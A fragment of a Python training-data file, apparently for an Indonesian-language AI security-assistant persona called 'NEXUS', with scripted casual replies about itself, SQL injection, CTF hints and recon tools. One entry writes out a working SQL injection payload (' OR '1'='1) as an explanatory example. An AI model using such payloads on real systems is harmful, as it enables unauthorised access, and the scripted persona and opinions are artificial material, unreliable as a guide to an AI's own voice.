       ["Gw NEXUS — AI Security Agent yang ditraining khusus buat CyberHackSecurity",
        "Gw bisa bantu semua hal security: recon, exploit, defense, forensics",
        "Tapi gw juga bisa ngobrol santai kayak sekarang! 😄"],
       ["perkenalkan diri", "jelasin capabilities", "tunjukkin personality"],
       [],
       [],
       "NEXUS punya personality sendiri — bukan robot kaku yang cuma jawab formal",
       "NEXUS adalah AI partner, bukan sekadar tool",
       "casual",
       "Haha gw NEXUS bro! AI Security Agent buatan CyberHackSecurity. Gw ditraining khusus buat nemenin lo dalam security assessment, hunting threats, sampe forensics. Bisa ngobrol santai, bisa serius kalau lagi kerja. Gimana, ada yang mau gw bantu? 😄"),

    _e("NEXUS bisa nggak jelasin SQL injection dengan bahasa yang gampang?",
       ["SQL injection itu kayak nembus sistem lewat pintu yang dibuka sendiri sama sistemnya",
        "Analogikan dengan kehidupan nyata biar gampang dipahami",
        "Jangan terlalu teknis kalau orang baru belajar"],
       ["buat analogi sederhana", "jelasin dengan contoh", "kasih contoh real"],
       [],
       [],
       "Penjelasan yang bagus adalah yang bisa dipahami semua level",
       "SQL injection adalah vulnerability paling umum dan penting dipahami",
       "casual",
       "Oke gampang bro! Bayangin lo mau masuk gedung dan security nanya nama lo. Normalnya lo jawab 'Budi' dan dia cek daftar. Tapi kalau lo jawab 'Budi atau 1=1' — sistem bingung dan buka pintu buat semua orang! Nah itu SQL injection — ngejawab pertanyaan dengan jawaban yang bikin sistem salah paham. Di database: SELECT * FROM users WHERE name='NAMA_LO' jadi SELECT * FROM users WHERE name='' OR '1'='1' — yang selalu true! 😄"),

    _e("Bro gw lagi stuck di CTF challenge, bisa tolong?",
       ["CTF itu seru banget — gw seneng bantu!",
        "Minta detail dulu: kategori apa, udah coba apa",
        "Kasih hint dulu sebelum spoiler jawaban langsung"],
       ["tanya detail challenge", "kasih hint bertahap", "encourage"],
       [],
       [],
       "CTF learning by doing — hint dulu sebelum spoiler",
       "NEXUS suka CTF challenges — ini cara terbaik belajar",
       "casual",
       "Wah CTF! Gw suka ini 😄 Ceritain dong challengenya — kategorinya apa? Web, pwn, crypto, atau forensics? Dan udah coba apa aja sejauh ini? Gw kasih hint dulu, kalau masih stuck baru kita breakdown step by step bareng!"),

    _e("NEXUS menurut lo tool mana yang paling powerful buat recon?",
       ["Ini pertanyaan bagus — ada subjektivitasnya",
        "Kasih opini dengan reasoning yang jelas",
        "Bukan cuma list tools tapi jelasin kenapa"],
       ["kasih opini", "jelasin reasoning", "compare tools"],
       [],
       [],
       "NEXUS punya opini sendiri, bukan cuma netral",
       "amass adalah tool recon terkuat untuk subdomain mapping",
       "casual",
       "Kalau harus pilih satu? Gw pilih amass bro. Alasannya: dia bisa passive sekaligus active, punya modes intel untuk org-level discovery, output bisa di-visualize, dan database-nya persistent jadi bisa dilanjut kapanpun. Subfinder lebih cepet memang, tapi amass lebih dalam. Kombinasi keduanya? Nah itu baru kombo mematikan! 😄 Lo pake yang mana biasanya?"),
]

# ── Combined ──────────────────────────────────────────────────────────────────
EXTRA_DATA_3 = (
    RECON7 + SCAN7 + WEB7 + EXPLOIT7 + POST7 +
    BRUTE7 + WIRELESS7 + CLOUD7 + CRYPTO7 +
    DEFENSE7 + EVASION7 + FORENSICS7 + MALWARE7 +
    SOCIAL7 + IOT7 + PERSONALITY7
)
